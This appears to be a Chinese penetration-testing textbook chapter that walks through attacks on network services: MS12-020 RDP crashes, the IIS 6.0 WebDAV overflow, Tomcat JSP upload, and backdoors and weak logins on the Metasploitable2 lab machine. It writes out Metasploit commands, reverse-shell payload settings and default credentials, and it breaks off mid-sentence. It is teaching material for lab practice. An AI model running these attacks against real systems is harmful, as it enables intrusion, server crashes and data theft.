第7章-7.1-網(wǎng)絡(luò)服務(wù)滲透

網(wǎng)絡(luò)服務(wù)滲透滲透測(cè)試基于Web應(yīng)用系統(tǒng)的滲透雖然較為常見(jiàn)，但是除了常見(jiàn)的Web系統(tǒng)滲透測(cè)試外，還可以從網(wǎng)絡(luò)服務(wù)進(jìn)行滲透測(cè)試攻擊。前言網(wǎng)絡(luò)服務(wù)滲透攻擊簡(jiǎn)介遠(yuǎn)程溢出藍(lán)屏DoS攻擊（CVE-2012-0002）IIS6.0遠(yuǎn)程代碼執(zhí)行（CVE-2017-7269）Tomcat任意文件上傳（CVE-2017-12615）網(wǎng)絡(luò)服務(wù)滲透是以遠(yuǎn)程主機(jī)運(yùn)行的某個(gè)網(wǎng)絡(luò)服務(wù)程序?yàn)槟繕?biāo)，向該目標(biāo)服務(wù)開放端口發(fā)送內(nèi)嵌惡意內(nèi)容并符合該網(wǎng)絡(luò)服務(wù)協(xié)議的數(shù)據(jù)包，利用網(wǎng)絡(luò)服務(wù)程序內(nèi)部的安全漏洞，劫持目標(biāo)程序控制流，實(shí)施遠(yuǎn)程執(zhí)行代碼等行為，最終達(dá)到控制目標(biāo)系統(tǒng)的目的。網(wǎng)絡(luò)服務(wù)滲透攻擊是通過(guò)系統(tǒng)自帶的網(wǎng)絡(luò)服務(wù)、微軟服務(wù)、第三方服務(wù)的漏洞進(jìn)行滲透攻擊。網(wǎng)絡(luò)服務(wù)滲透以Windows系統(tǒng)平臺(tái)為例，根據(jù)網(wǎng)絡(luò)服務(wù)攻擊面的類別來(lái)區(qū)分，可將網(wǎng)絡(luò)服務(wù)滲透攻擊分為以下三類。針對(duì)Windows系統(tǒng)自帶網(wǎng)絡(luò)服務(wù)的滲透攻擊針對(duì)Windows系統(tǒng)上微軟網(wǎng)絡(luò)服務(wù)的滲透攻擊針對(duì)Windows系統(tǒng)上第三方網(wǎng)絡(luò)服務(wù)的滲透攻擊網(wǎng)絡(luò)服務(wù)滲透簡(jiǎn)介1.針對(duì)Windows系統(tǒng)自帶網(wǎng)絡(luò)服務(wù)的滲透攻擊

在針對(duì)網(wǎng)絡(luò)服務(wù)滲透攻擊中，由于Windows系統(tǒng)的流行程度，使得Windows系統(tǒng)上運(yùn)行的網(wǎng)絡(luò)服務(wù)程序成了高危對(duì)象，尤其是那些Windows系統(tǒng)自帶的默認(rèn)安裝、啟用的網(wǎng)絡(luò)服務(wù)，如SMB、RPC等。甚至有些服務(wù)對(duì)于特定服務(wù)器來(lái)說(shuō)是必須開啟的，如一個(gè)網(wǎng)站主機(jī)的IIS服務(wù)。其中的經(jīng)典案例包括MS06-040、MS07-029、MS08-067、MS11-058、MS12-020等。網(wǎng)絡(luò)服務(wù)滲透簡(jiǎn)介2.針對(duì)Windows系統(tǒng)上微軟網(wǎng)絡(luò)服務(wù)的滲透攻擊

微軟公司提供的網(wǎng)絡(luò)服務(wù)產(chǎn)品常見(jiàn)的有IISInternet服務(wù)、數(shù)據(jù)庫(kù)服務(wù)、Exchange電子郵件服務(wù)、MSDTC服務(wù)、DNS域名服務(wù)、WINS服務(wù)等。這些網(wǎng)絡(luò)服務(wù)中存在著各種各樣的安全漏洞，滲透測(cè)試中最常見(jiàn)的是針對(duì)IISInternet服務(wù)和數(shù)據(jù)庫(kù)服務(wù)的攻擊。IISInternet服務(wù)集成了HTTP、FTP、SMTP等諸多網(wǎng)絡(luò)服務(wù)。IIS6.0之前的版本包含大量的安全漏洞，其類型包括信息泄露、目錄遍歷、緩沖區(qū)溢出等。在IIS6.0推出后，安全性有較大提升，但仍然有不少高等級(jí)的安全漏洞，如IPP服務(wù)整數(shù)溢出漏洞MS08-062、導(dǎo)致FTP服務(wù)遠(yuǎn)程代碼執(zhí)行漏洞MS09-053、IIS認(rèn)證內(nèi)存破壞漏洞MS10-040等。網(wǎng)絡(luò)服務(wù)滲透簡(jiǎn)介3.針對(duì)Windows系統(tǒng)上第三方網(wǎng)絡(luò)服務(wù)的滲透攻擊

在操作系統(tǒng)中運(yùn)行的非系統(tǒng)廠商提供的網(wǎng)絡(luò)服務(wù)都可稱之為第三方網(wǎng)絡(luò)服務(wù)，與系統(tǒng)廠商提供的網(wǎng)絡(luò)服務(wù)沒(méi)有本質(zhì)區(qū)別，比較常見(jiàn)的包括：提供HTTP服務(wù)的Apache、IBMWebSphere、Tomcat等；提供SQL數(shù)據(jù)庫(kù)服務(wù)的Oracle、MySQL；以及提供FTP服務(wù)的Serv-U、FileZilla等。攻擊者在嘗試攻擊默認(rèn)系統(tǒng)服務(wù)未果之后，往往會(huì)通過(guò)掃描服務(wù)的默認(rèn)端口，來(lái)探測(cè)用戶系統(tǒng)是否使用一些常見(jiàn)的第三方服務(wù)，嘗試?yán)眠@些服務(wù)的弱點(diǎn)滲透對(duì)方系統(tǒng)。網(wǎng)絡(luò)服務(wù)滲透簡(jiǎn)介網(wǎng)絡(luò)服務(wù)滲透攻擊簡(jiǎn)介遠(yuǎn)程溢出藍(lán)屏DoS攻擊（CVE-2012-0002）IIS6.0遠(yuǎn)程代碼執(zhí)行（CVE-2017-7269）Tomcat任意文件上傳（CVE-2017-12615）

2012年爆出的CVE-2012-0002漏洞，也就是我們常說(shuō)的MS12-020漏洞

，該漏洞存在于RDP服務(wù)的底層驅(qū)動(dòng)文件Rdpwd.sys中，屬于內(nèi)核級(jí)漏洞。攻擊者經(jīng)過(guò)向遠(yuǎn)程主機(jī)的3389端口發(fā)送惡意數(shù)據(jù)包，導(dǎo)致服務(wù)程序使用一個(gè)不存在的指針，致使遠(yuǎn)程主機(jī)崩潰，達(dá)到拒絕服務(wù)攻擊的目的。受影響產(chǎn)品：

包括開啟RDP的MicrosoftWindowsXPProfessional、MicrosoftWindowsXPHome、MicrosoftWindowsServer2003StandardEdition、MicrosoftWindowsServer2003EnterpriseEdition、MicrosoftWindowsServer2003DatacenterEdition、MicrosoftWindows7。遠(yuǎn)程溢出藍(lán)屏DOS攻擊（CVE-2012-0002）1.使用Nmap對(duì)目標(biāo)進(jìn)行操作系統(tǒng)探測(cè)sudonmap-O32發(fā)現(xiàn)是WindowsServer2003sp2，在CVE-2012-0002影響范圍內(nèi)遠(yuǎn)程溢出藍(lán)屏DOS攻擊（CVE-2012-0002）2.利用msf尋找對(duì)應(yīng)漏洞利用模塊，使用check腳本對(duì)目標(biāo)進(jìn)行檢查，檢查系統(tǒng)是否存在MS12-020漏洞。遠(yuǎn)程溢出藍(lán)屏DOS攻擊（CVE-2012-0002）3.使用漏洞利用腳本進(jìn)行遠(yuǎn)程攻擊```useauxiliary/dos/windows/rdp/ms12_020_maxchannelidssetrhosts32Run```遠(yuǎn)程溢出藍(lán)屏DOS攻擊（CVE-2012-0002）網(wǎng)絡(luò)服務(wù)滲透攻擊簡(jiǎn)介遠(yuǎn)程溢出藍(lán)屏DoS攻擊（CVE-2012-0002）IIS6.0遠(yuǎn)程代碼執(zhí)行（CVE-2017-7269）Tomcat任意文件上傳（CVE-2017-12615）IISInternet服務(wù)是微軟公司提供的網(wǎng)絡(luò)服務(wù)產(chǎn)品常見(jiàn)的服務(wù)之一，IISInternet服務(wù)集成了HTTP、FTP、SMTP等諸多網(wǎng)絡(luò)服務(wù)。IIS6.0之前的版本包含大量的安全漏洞，其類型包括信息泄露、目錄遍歷、緩沖區(qū)溢出等。IIS6.0默認(rèn)不開啟WebDAV，可是一旦開啟了WebDAV支持，WebDAV服務(wù)中的ScStorgPathFromUrl函數(shù)存在緩沖區(qū)溢出漏洞，遠(yuǎn)程攻擊者通過(guò)以“if:<http://"開頭的長(zhǎng)headerPROPFIND請(qǐng)求，執(zhí)行任意代碼，危害極大。受影響產(chǎn)品：MicrosoftWindowsServer2003R2開啟WebDAV服務(wù)的IIS6.0IIS6.0遠(yuǎn)程代碼執(zhí)行（CVE-2017-7269）1.使用Nmap對(duì)目標(biāo)進(jìn)行詳細(xì)服務(wù)探測(cè)nmap-sV32IIS6.0遠(yuǎn)程代碼執(zhí)行（CVE-2017-7269）2.下載exp。地址如下：gitclone/Al1ex/CVE-2017-72693.將exploit移動(dòng)到攻擊機(jī)中Metasploit的iis模塊下面sudomvcve-2017-7269.rb/usr/share/metasploit-framework/modules/exploits/windows/iis/cve_2017_7269.rbIIS6.0遠(yuǎn)程代碼執(zhí)行（CVE-2017-7269）4.reload_all重新加載msf模塊，然后搜索相應(yīng)攻擊模塊IIS6.0遠(yuǎn)程代碼執(zhí)行（CVE-2017-7269）5.加載模塊，開始攻擊。命令如下：useexploit/windows/iis/cve_2017_7269setpayloadwindows/meterpreter/reverse_tcpsetrhost32setlhost31runIIS6.0遠(yuǎn)程代碼執(zhí)行（CVE-2017-7269）6.成功獲取目標(biāo)系統(tǒng)權(quán)限IIS6.0遠(yuǎn)程代碼執(zhí)行（CVE-2017-7269）網(wǎng)絡(luò)服務(wù)滲透攻擊簡(jiǎn)介遠(yuǎn)程溢出藍(lán)屏DoS攻擊（CVE-2012-0002）IIS6.0遠(yuǎn)程代碼執(zhí)行（CVE-2017-7269）Tomcat任意文件上傳（CVE-2017-12615）

Tomcat服務(wù)器是一個(gè)免費(fèi)的開放源代碼的Web應(yīng)用服務(wù)器，屬于輕量級(jí)應(yīng)用服務(wù)器，在中小型系統(tǒng)和并發(fā)訪問(wèn)用戶不是很多的場(chǎng)合下被普遍使用，是開發(fā)和調(diào)試JSP程序的首選。2017年9月19日，ApacheTomcat官方確認(rèn)一個(gè)高危漏洞CVE-2017-12615，在一定條件下，攻擊者可以利用這個(gè)漏洞，獲取用戶服務(wù)器上JSP文件的源代碼，或是通過(guò)精心構(gòu)造的攻擊請(qǐng)求，向用戶服務(wù)器上傳惡意JSP文件，通過(guò)上傳的JSP文件，可在用戶服務(wù)器上執(zhí)行任意代碼，從而導(dǎo)致數(shù)據(jù)泄露或獲取服務(wù)器權(quán)限，存在高安全風(fēng)險(xiǎn)。受影響產(chǎn)品：ApacheTomcat7.0.0-7.0.79(windows環(huán)境)Tomcat任意文件上傳（CVE-2017-12615）1.使用Nmap對(duì)目標(biāo)進(jìn)行詳細(xì)服務(wù)探測(cè)nmap-sV32發(fā)現(xiàn)目標(biāo)是Windows主機(jī)并且8080端口是Tomcat服務(wù).Tomcat任意文件上傳（CVE-2017-12615）Tomcat任意文件上傳（CVE-2017-12615）2.使用dirb工具對(duì)web目錄進(jìn)行掃描，發(fā)現(xiàn)Tomcat后臺(tái)目錄為rootdirb32:8080/root/-wordlsit/usr/share/wordlists/dirb/big.txt3.使用whatweb對(duì)目標(biāo)Tomcat進(jìn)行信息搜集，發(fā)現(xiàn)是7.0.40版本，在CVE-2017-12615漏洞影響范圍內(nèi)whatweb32:8080/root/Tomcat任意文件上傳（CVE-2017-12615）Tomcat任意文件上傳（CVE-2017-12615）4.抓包上傳一個(gè)內(nèi)容為test的shell.jsp測(cè)試文件，服務(wù)器響應(yīng)404錯(cuò)誤Tomcat任意文件上傳（CVE-2017-12615）5.在上傳文件后加/，服務(wù)器響應(yīng)201Created，成功上傳Tomcat任意文件上傳（CVE-2017-12615）6.上傳簡(jiǎn)單的jsp木馬，命令執(zhí)行Metasploitable2虛擬系統(tǒng)是一個(gè)特別制作的ubuntu操作系統(tǒng)，本身設(shè)計(jì)作為安全工具測(cè)試和演示常見(jiàn)漏洞攻擊，比上一個(gè)版本包含更多可利用的安全漏洞。這個(gè)版本的虛擬系統(tǒng)兼容VMware，VirtualBox和其他虛擬平臺(tái)。默認(rèn)開放賬號(hào)：普通用戶：msfadmin密碼：msfadminMetasploitable2-Linux網(wǎng)絡(luò)服務(wù)滲透實(shí)踐使用metasploit對(duì)linux主機(jī)metasploitable-linux2進(jìn)行信息收集。命令如下：nmap–sV90信息收集默認(rèn)賬號(hào)密碼：msfadmin/msfadmin。命令如下：telnet90telnet弱口令登錄默認(rèn)mysql數(shù)據(jù)庫(kù)root用戶空密碼。命令如下：mysql-h90-uroot-pMysql弱口令登錄Postgres數(shù)據(jù)庫(kù)默認(rèn)賬號(hào)口令：postgres/postgres。命令如下：psql-h90-UpostgresPostgresql弱密碼登錄vnc弱口令密碼：password。命令如下：vncviewer90vnc弱口令登錄TCP端口512,513和514為著名的rlogin提供服務(wù)。在系統(tǒng)中被錯(cuò)誤配置從而允許遠(yuǎn)程訪問(wèn)者從任何地方訪問(wèn)。使用msfadmin賬號(hào)進(jìn)行登錄。命令如下：rloginmsfadmin@90Rlogin錯(cuò)誤配置漏洞Metasploitable2

在21端口上運(yùn)行著vsftpd服務(wù)，一個(gè)使用廣泛的FTP服務(wù)。這個(gè)特別的版本包含一個(gè)后門允許一個(gè)未知的入侵者進(jìn)入核心代碼。如果在發(fā)送的用戶名后面加上”：）”（笑臉?lè)?hào)），這個(gè)版本的后門會(huì)在6200端口上打開一個(gè)監(jiān)聽(tīng)的shell。Metasploit命令如下：useexploit/unix/ftp/vsftpd_234_backdoorsetrhost90exploitvsftpd后門某些鏡像站點(diǎn)的UnrealIRcd，在DEBUG3_DOLOG_SYSTEM宏中外部引入的惡意代碼，遠(yuǎn)程攻擊者能夠執(zhí)行任意代碼。在Metasploitable2

的6667端口上運(yùn)行著UnreaIRCD

IRC的守護(hù)進(jìn)程。通過(guò)在一個(gè)系統(tǒng)命令后面添加兩個(gè)字母”AB“發(fā)送給被攻擊服務(wù)器任意一個(gè)監(jiān)聽(tīng)該端口來(lái)觸發(fā)。Metasploit命令如下：useexploit/unix/irc/unreal_ircd_3281_backdoorsetpayloadcmd/unix/reverse_perlsetrhost90setlhost31exploitUnrealRCDIRC漏洞Samba的sambd默認(rèn)配置在可寫文件共享時(shí)，存在目錄遍歷漏洞，遠(yuǎn)程用戶可以通過(guò)smbclient端使用一個(gè)對(duì)稱命，創(chuàng)建一個(gè)包含..的目錄遍歷符的軟連接，可以進(jìn)行目錄遍歷以及訪問(wèn)任意文件。Metasploit命令如下：useauxiliary/admin/smb/samba_symlink_traversalsetrhosts90setsmbsharetmpexploitSamba默認(rèn)配置目錄遍歷漏洞攻擊成功后，利用smbclient進(jìn)行連接，無(wú)需root密碼即可訪問(wèn)資源。命令如下：smbclient//90/tmpSamba默認(rèn)配置目錄遍歷漏洞Samba中負(fù)責(zé)在SAM數(shù)據(jù)庫(kù)更新用戶口令的代碼未經(jīng)過(guò)濾便將用戶輸入傳輸給了/bin/sh。如果在調(diào)用smb.conf中定義的外部腳本時(shí)，通過(guò)對(duì)/bin/sh的MS-RPC調(diào)用提交了惡意輸入的話，就可能允許攻擊者以nobody用戶的權(quán)限執(zhí)行任意命令。Metasploit命令如下：useexploit/multi/samba/usermap_scriptsetrhosts90exploitSambaMS-RPCShell命令注入漏洞程序監(jiān)聽(tīng)在1524端口，連接到1524端口就可以直接獲得root權(quán)限。命令如下：telnet901524Ingreslock后門JavaRMIServer的RMI注冊(cè)表和RMI激活服務(wù)的默認(rèn)配置存在安全漏洞，可被利用導(dǎo)致代碼執(zhí)行,服務(wù)運(yùn)行端口1099。Metasploit命令如下：useexploit/multi/misc/java_rmi_serversetrhosts90exploit攻擊成功后，會(huì)建立一個(gè)session，使用sessions